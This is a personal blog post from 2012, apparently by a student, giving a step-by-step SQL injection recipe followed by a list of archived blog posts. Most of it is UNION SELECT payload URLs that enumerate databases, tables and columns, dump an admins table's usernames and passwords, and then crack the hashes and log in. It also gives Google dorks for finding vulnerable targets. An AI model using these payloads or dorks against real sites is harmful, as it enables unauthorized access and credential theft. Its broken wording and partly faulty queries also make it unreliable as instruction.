I am not a hacker's brother: |
but I want to learn .... hence my post about SQL Injection
- SQL injection (look for the weaknesses of the input ID)
1. give quotes on the back id => to find a web bug
2. use the command http:// ...... order by 1 - (manually) on the back of the site
3. use the command http:// ...... union select 1,2,3,4,5,6,7,8,9,10,11
after appearing magic number (gap) exp: 4 and 5
with orders union select 1,2,3, version (), 5,6,7,8,9,10,11
command to remove a database
http:// .... union select 1,2,3, database (), 5,6,7,8,9,10,11
command to remove the data table "
http:// .... union select 1,2,3, table_name, 5,6,7,8,9,10,11 from information_schema.tables where table_schema = database () -
displays all the table:
http:// .... union select 1,2,3, GROUP_CONCAT (table_name), 5,6,7,8,9,10,11 from information_schema.tables where table_schema = database () -
search all columns:
http:// .... union select 1,2,3, GROUP_CONCAT (column_name), 5,6,7,8,9,10,11 from information_schema.columns where table_name = database () -
converting to hex:
with the site: http://bernadsatriani.net/ascii.htm
Capture hex code:
http:// .... union select 1,2,3, GROUP_CONCAT (column_name), 5,6,7,8,9,10,11 from information_schema.columns where table_name = 0xkode ascii (hex) -
after the last known name column:
http:// .... union select 1,2,3, GROUP_CONCAT (username, 0x3a, password), 5,6,7,8,9,10,11 from admins -
to give: => 0x3a
after can be a password and username
its on crack passwords using md5 cracker application, or the other.
after that it can be the password,, try to login live.
in addition to the manual can also use the application:
schemafuzz
looking for admin page
inurl: "php? id ="
site: (website address) inurl: "php? id ="
order by -
- RFI
- LFI
- CSRF
Search
Categories
Archives
-
▼
2012
(61)
-
▼
Januari
(26)
- App Update Twiiter
- The IP Address and Classes
- already know about the TCP-IP's well this time I ...
- SQL Injection
- Learn Linux
- Hacking and Cracking Activity at a Glance
- The basic syntax of PHP
- Learning Java Script
- notes facing the SLC
- this post just wanted to share it .......
- Short Learning About OOP
- the History of Operating Systems
- Operating System
- How do I partition my hard drive?
- The Network Traffic Path
- Bon Jovi_Always My Favorite
- Battle PES 2012
- BinaryTree C++
- Ebook Ubuntu Installation
- Superscalar difference with Superpipeline
- RISC (Reduced Instruction Set Computing)
- Tiger UAD Ubuntu Repository
- Linux Installation Preparation
- Android User Interfaces
- Learning to Become the Android Developer
- Project Task Data Structures "Application Queue Bus"
-
▼
Januari
(26)